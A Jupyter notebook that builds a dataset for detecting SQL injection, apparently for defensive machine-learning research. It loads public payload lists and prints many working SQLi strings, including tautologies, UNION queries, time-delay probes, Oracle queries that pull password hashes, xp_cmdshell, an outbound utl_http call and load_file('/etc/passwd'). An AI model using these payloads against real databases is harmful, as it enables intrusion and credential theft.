### This notebook is intended to predict sql injection attacks
    Total data  : 5234
    Benign data : 3072 + 744 = 3816
    SQLI Data   : 1128 + 290 = 1418
    
#### At the end of notebook are results of testing

In [199]:

# import required packages

import glob
import time
import pandas as pd
# from xml.dom import minidom
from nltk import ngrams
from nltk.tokenize import sent_tokenize
import nltk
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
from nltk.stem import PorterStemmer
from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import stopwords 
from nltk.tokenize import word_tokenize

[nltk_data] Downloading package punkt to /home/ebryx/nltk_data...
[nltk_data]   Package punkt is already up-to-date!
[nltk_data] Downloading package stopwords to /home/ebryx/nltk_data...
[nltk_data]   Package stopwords is already up-to-date!
[nltk_data] Downloading package wordnet to /home/ebryx/nltk_data...
[nltk_data]   Package wordnet is already up-to-date!

In [200]:
import keras

In [201]:
import nltk
import pandas as pd
import os

### File_name: git_foospidy_payloads_fuzzing_code_db_sqli.txt
##### Comments :  
1. removed \n at the end of each line
2.  replaced %20 by space
#### Source: https://github.com/foospidy/payloads/blob/7749dd0bfcc64786feb22f578b978d2f8607e353/owasp/fuzzing_code_database/sqli/sqli.txt

In [202]:
# preprocess sql data to have same format for all files

def clean_sqli_data(data):
    
    for i in range(len(data)):
        
        data[i]=data[i].replace('\n', '')
        data[i]=data[i].replace('%20', ' ')
        data[i]=data[i].replace('=', ' = ')
        data[i]=data[i].replace('((', ' (( ')
        data[i]=data[i].replace('))', ' )) ')
        data[i]=data[i].replace('(', ' ( ')
        data[i]=data[i].replace(')', ' ) ')
    
    return data

In [203]:
path='./data/collection/git_foospidy_payloads_fuzzing_code_db_sqli.txt'

In [204]:
# read data from file

sql_lines_fuzzing=[]
f = open(path, "r")
for x in f:
    sql_lines_fuzzing.append(x)

In [205]:
sql_lines_fuzzing=clean_sqli_data(sql_lines_fuzzing)

In [206]:
sql_lines_fuzzing[:15]

["'sqlvuln",
 "'+sqlvuln",
 'sqlvuln;',
 ' ( sqlvuln ) ',
 "a' or 1 = 1--",
 '"a"" or 1 = 1--"',
 ' or a  =  a',
 "a' or 'a'  =  'a",
 '1 or 1 = 1',
 "a' waitfor delay '0:0:10'--",
 "1 waitfor delay '0:0:10'--",
 'declare @q nvarchar  ( 4000 )  select @q  = ',
 '0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A',
 '0',
 '031003000270000']

### File_Name: git_foospidy_payloads_other_sqli_camoufl4g3.txt
##### Comments : ok
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [207]:
path='./data/collection/git_foospidy_payloads_other_sqli_camoufl4g3.txt'

In [208]:
# read data from file

sql_lines_camoufl4g3=[]
f = open(path, "r")
for x in f:
    sql_lines_camoufl4g3.append(x)

In [209]:
sql_lines_camoufl4g3[:15] # data before cleaning

["'-'\n",
 "' '\n",
 "'&'\n",
 "'^'\n",
 "'*'\n",
 "' or ''-'\n",
 "' or '' '\n",
 "' or ''&'\n",
 "' or ''^'\n",
 "' or ''*'\n",
 '"-"\n',
 '" "\n',
 '"&"\n',
 '"^"\n',
 '"*"\n']

In [210]:
sql_lines_camoufl4g3=clean_sqli_data(sql_lines_camoufl4g3)

In [211]:
sql_lines_camoufl4g3[:15]  # data after cleaning

["'-'",
 "' '",
 "'&'",
 "'^'",
 "'*'",
 "' or ''-'",
 "' or '' '",
 "' or ''&'",
 "' or ''^'",
 "' or ''*'",
 '"-"',
 '" "',
 '"&"',
 '"^"',
 '"*"']

### File_Name: git_foospidy_payloads_other_sqli_libinjection-bypasses.txt
##### Comments: Should Remove &()o1: from start of each sentence
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [212]:
path='./data/collection/git_foospidy_payloads_other_sqli_libinjection-bypasses.txt'

In [213]:
# read data from file

sql_lines_bypasses=[]
f = open(path, "r")
for x in f:
    sql_lines_bypasses.append(x)

In [214]:
sql_lines_bypasses[:5] # before cleaning

['&()o1: select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 '&(.)o: select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 '&(1&1: select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 '&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&(1UE: select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n']

In [215]:
print(len(sql_lines_bypasses))

474

In [216]:
sql_lines_bypasses=clean_sqli_data(sql_lines_bypasses)

In [217]:
sql_lines_bypasses[:5]  # data after cleaning

['& (  ) o1: select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 '& ( . ) o: select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 '& ( 1&1: select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 '& ( 1 ) o: select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '& ( 1UE: select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1']

In [218]:
# if don't want &(*)* sign in beginning of each sentence then run next code else don't

for i in range(len(sql_lines_bypasses)):
    sentence=sql_lines_bypasses[i]
    sql_lines_bypasses[i]=sentence.split(':')[1]

In [219]:
sql_lines_bypasses[:5]

[' select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1']

### File_Name: git_foospidy_payloads_owasp_sqli.txt
##### Comments: ok
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [220]:
path='./data/collection/git_foospidy_payloads_owasp_sqli.txt'

In [221]:
# read data from file

sql_lines_owasp=[]
f = open(path, "r")
for x in f:
    sql_lines_owasp.append(x)

In [222]:
sql_lines_owasp[0:15] # before cleaning

['a\n',
 "a' \n",
 "a' --\n",
 "a' or 1=1; --\n",
 '@\n',
 '?\n',
 "' and 1=0) union all\n",
 '? or 1=1 --\n',
 "x' and userid is NULL; --\n",
 "x' and email is NULL; --\n",
 "anything' or 'x'='x\n",
 "x' and 1=(select count(*) from tabname); --\n",
 "x' and members.email is NULL; --\n",
 "x' or full_name like '%bob%\n",
 '23 or 1=1; --\n']

In [223]:
print(len(sql_lines_owasp))

167

In [224]:
sql_lines_owasp=clean_sqli_data(sql_lines_owasp)

In [225]:
sql_lines_owasp[:15] # after cleaning

['a',
 "a' ",
 "a' --",
 "a' or 1 = 1; --",
 '@',
 '?',
 "' and 1 = 0 )  union all",
 '? or 1 = 1 --',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --']

### File_Name: git_seclist_fuzzing_sqli_Generic-SQLi.txt
##### comments: should we remove %20 by spaces because %20 equals to space
#### Source: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/SQLi

In [226]:
path='./data/collection/git_seclist_fuzzing_sqli_Generic-SQLi.txt'

In [227]:
# read data from file

sql_lines_Generic=[]
f = open(path, "r")
for x in f:
    sql_lines_Generic.append(x)

In [228]:
sql_lines_Generic[:15] # before cleaning

[")%20or%20('x'='x\n",
 '%20or%201=1\n',
 "; execute immediate 'sel' || 'ect us' || 'er'\n",
 'benchmark(10000000,MD5(1))#\n',
 'update\n',
 '";waitfor delay \'0:0:__TIME__\'--\n',
 '1) or pg_sleep(__TIME__)--\n',
 '||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n',
 '"hi"") or (""a""=""a"\n',
 'delete\n',
 'like\n',
 '" or sleep(__TIME__)#\n',
 'pg_sleep(__TIME__)--\n',
 '*(|(objectclass=*))\n',
 'declare @q nvarchar (200) 0x730065006c00650063 ...\n']

In [229]:
print(len(sql_lines_Generic))

268

In [230]:
sql_lines_Generic=clean_sqli_data(sql_lines_Generic)

In [231]:
sql_lines_Generic[:15] # after cleaning

[" )  or  ( 'x' = 'x",
 ' or 1 = 1',
 "; execute immediate 'sel' || 'ect us' || 'er'",
 'benchmark ( 10000000,MD5 ( 1  )  )  #',
 'update',
 '";waitfor delay \'0:0:__TIME__\'--',
 '1 )  or pg_sleep ( __TIME__ ) --',
 '|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  ',
 '"hi"" )  or  ( ""a"" = ""a"',
 'delete',
 'like',
 '" or sleep ( __TIME__ ) #',
 'pg_sleep ( __TIME__ ) --',
 '* ( | ( objectclass = *  )  )  ',
 'declare @q nvarchar  ( 200 )  0x730065006c00650063 ...']

### File_name: scottparker_ml_sqli_src__trainingdata_plain.txt
##### Comments: 
removed last 22 records containing URLs
#### Source: https://github.com/tungpv98/Detect-Sql-Injection-by-Machine-Learning/tree/ebeb3287931677a3a42f11a7a08dbc13e374ff05/Sql-Injection/source/trainingdata

In [232]:

# function to remove stopwords

stop_words = set(stopwords.words('english')) 

def fun_remove_stop_words(posts):

    filtered=''
    
    for x in posts.split(' '):
        if x not in stop_words:
            filtered+=' '+x
    
    return filtered

In [233]:
path='./data/collection/'
file="scottparker_ml_sqli_src__trainingdata_plain.txt"

In [234]:
#read benign data

df = pd.read_csv(os.path.join(path,file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python')

In [235]:
df.head()

                                         benign
0                           Add plain text here
1                      Ne te quaesiveris extra.
2    Man is his own star; and the soul that can
3           Render an honest and a perfect man,
4  Commands all light, all influence, all fate;

In [236]:
plain_text=df['benign'].values  # get sentences

In [237]:
plain_text[:5]

array(['Add plain text here', 'Ne te quaesiveris extra.',
       'Man is his own star; and the soul that can',
       'Render an honest and a perfect man,',
       'Commands all light, all influence, all fate;'], dtype=object)

In [238]:
plain_text=plain_text[:-22] # removed last 22 records that were urls

In [239]:
len(plain_text)

3672

In [240]:
# convert from list to string

data=''
for x in plain_text:
    data+=" " + x

In [241]:
type(data)

str

In [242]:
data=fun_remove_stop_words(data)  # remove stop words
data=data.split('.')              # split sentences

In [243]:
# seperate words inside tags

for i in range(len(data)):
    data[i]=data[i].replace('<', ' <')
    data[i]=data[i].replace('>', '> ')
    data[i]=data[i].replace('=', ' = ')

In [244]:
data[:5]

['  Add plain text Ne te quaesiveris extra',
 ' Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late',
 ' Our acts angels are, good ill, Our fatal shadows walk us still',
 ' Epilogue Beaumont Fletcher’s Honest Man’s Fortune Cast bantling rocks, Suckle she-wolf’s teat; Wintered hawk fox, Power speed hands feet',
 ' I read day verses written eminent painter original conventional']

Statistics

In [245]:
print("Benign records: %2i" %len(data))

Benign records: 3072

In [246]:
# read self created benign data

path='./data/collection/benign_for_training.txt'
benign_data=[]
f = open(path, "r")
for x in f:
    benign_data.append(x)

In [247]:
# read self created sqli data

path='./data/collection/sqli_for_training.txt'
sqli_data=[]
f = open(path, "r")
for x in f:
    sqli_data.append(x)

In [248]:
len(benign_data)

442

In [249]:
benign_sentence=[]
for i in benign_data:
    sentences=i.split('.')
    
    for sentence in sentences:
        benign_sentence.append(sentence)

In [259]:
len(benign_sentence)

744

In [255]:
print("total benign data : " ,len(benign_sentence)+len(data))

total benign data :  3816

In [251]:
len(sqli_data)

290

In [258]:
1128+290

1418

In [252]:
print(f"SQL fuzzing : {len(sql_lines_fuzzing)}  camoufl4gs : {len(sql_lines_camoufl4g3)} parsed : {len(sql_lines_bypasses)} owasp : {len(sql_lines_owasp)} generic : {len(sql_lines_Generic)} \n total sql injection data : {len(sql_lines_Generic)+len(sql_lines_owasp)+len(sql_lines_bypasses)+len(sql_lines_camoufl4g3)+len(sql_lines_fuzzing)} ")

SQL fuzzing : 142  camoufl4gs : 77 parsed : 474 owasp : 167 generic : 268
 total sql injection data : 1128

#### combination of all sqli attacks

In [253]:
all_sqli_sentence=sql_lines_owasp+sql_lines_bypasses+sql_lines_camoufl4g3+sql_lines_fuzzing+sql_lines_Generic

In [254]:
len(all_sqli_sentence)

1128

In [158]:
# replace numeric values by a keyword 'numeric'
def optional_numeric_to_numeric(all_sqli_sentence):
    
    for i in range(len(all_sqli_sentence)):
        

        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1 ', 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 1', 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("'1 ", "'numeric ")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 1'", " numeric'")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1,', 'numeric,')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("1\ ", 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("‘1", '‘numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 2 ", " numeric ")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 3 ', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 3--', ' numeric--')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 4 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 5 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 6 ', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 7 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 8 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1234', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("22", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 8 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 200 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("23 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('"1', '"numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1"', '"numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("7659", 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 37 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 45 ", ' numeric ')
    
    return all_sqli_sentence

In [159]:
all_sqli_sentence

['a',
 "a' ",
 "a' --",
 "a' or 1 = 1; --",
 '@',
 '?',
 "' and 1 = 0 )  union all",
 '? or 1 = 1 --',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --',
 "'; exec master..xp_cmdshell 'ping 172.10.1.255'--",
 'a',
 '1 or 1 = 1',
 "1' or '1' = '1",
 "1 and user_name (  )   =  'dbo'",
 '1',
 "1'1",
 '1 exec sp_  ( or exec xp_ ) ',
 '1 and 1 = 1',
 "1' and 1 =  ( select count ( * )  from tablenames ) ; --",
 '1',
 "1 and user_name (  )   =  'dbo'",
 "\\'; desc users; --",
 "1\\'1",
 "1' and non_existant_table  =  '1",
 "' or username is not NULL or username  =  '",
 "1 and ascii ( lower ( substring  (  (  select top 1 name from sysobjects where xtype = 'u' ) , 1, 1  )  )   )  > 116",
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --",
 '1 uni/**/on select all from where',
 '’ or ‘1’ = ’1',
 "' or '1' = '1",
 "'||utl_http.request ( 'httP://192.168.1.1/' ) ||'",
 "' || myappadmin.adduser ( 'admin', 'newpass' )  || '",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT banner FROM v$version WHERE ROWNUM = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.LOGIN_USER FROM DUAL  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.DATABASE_NAME FROM DUAL  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT host_name FROM v$instance  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT global_name FROM global_name  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( USERNAME  )  )   FROM SYS.ALL_USERS  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( PASSWORD  )  )   FROM SYS.USER$  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( table_name  )  )   FROM sys.all_tables  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( column_name  )  )   FROM sys.all_tab_columns  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( GRANTED_ROLE  )  )   FROM DBA_ROLE_PRIVS WHERE GRANTEE = SYS.LOGIN_USER  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 1  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 2  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 3  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 4  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 5  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 6  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "'|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  ",
 '||6',
 "'||'6",
 ' ( ||6 ) ',
 "' or 1 = 1-- ",
 'or 1 = 1',
 "' or '1' = '1",
 "; or '1' = '1'",
 '" or isNULL ( 1/0 )  /*',
 "' or '7659' = '7659",
 '" or isNULL ( 1/0 )  /*',
 "' -- ",
 "' or 1 = 1--",
 '" or 1 = 1--',
 "' or 1 = 1 /*",
 'or 1 = 1--',
 "' or 'a' = 'a",
 '" or "a" = "a',
 "' )  or  ( 'a' = 'a",
 "admin' or '",
 "' select * from information_schema.tables--",
 ' )  union select * from information_schema.tables;',
 "' having 1 = 1--",
 "' having 1 = 1--",
 "' group by userid having 1 = 1--",
 "' select name from syscolumns where id  =   ( select id from sysobjects where name  =  tablename' ) --",
 "' or 1 in  ( select @@version ) --",
 "' union all select @@version--",
 "' or 'unusual'  =  'unusual'",
 "' or 'something'  =  'some'+'thing'",
 "' or 'text'  =  n'text'",
 "' or 'something' like 'some%'",
 "' or 2 > 1",
 "' or 'text' > 't'",
 "' or 'whatever' in  ( 'whatever' ) ",
 "' or 2 between 1 and 3",
 "' or username like char ( 37 ) ;",
 "' union select * from users where login  =  char ( 114,111,111,116 ) ;",
 "' union select ",
 'password:*/ = 1--',
 'uni/**/on sel/**/ect',
 "'; execute immediate 'sel' || 'ect us' || 'er'",
 "'; exec  ( 'sel' + 'ect us' + 'er' ) ",
 "'/**/or/**/1/**/ = /**/1",
 "' or 1/*",
 ' or isNULL ( 1/0 )  /*',
 "' or '7659' = '7659",
 '" or isNULL ( 1/0 )  /*',
 "' -- &password = ",
 "'; begin declare @var varchar ( 8000 )  set @var = ':' select @var = @var+'+login+'/'+password+' ' from users where login > ",
 '@var select @var as var into temp end --',
 "' and 1 in  ( select var from temp ) --",
 "' union select 1,load_file ( '/etc/passwd' ) ,1,1,1;",
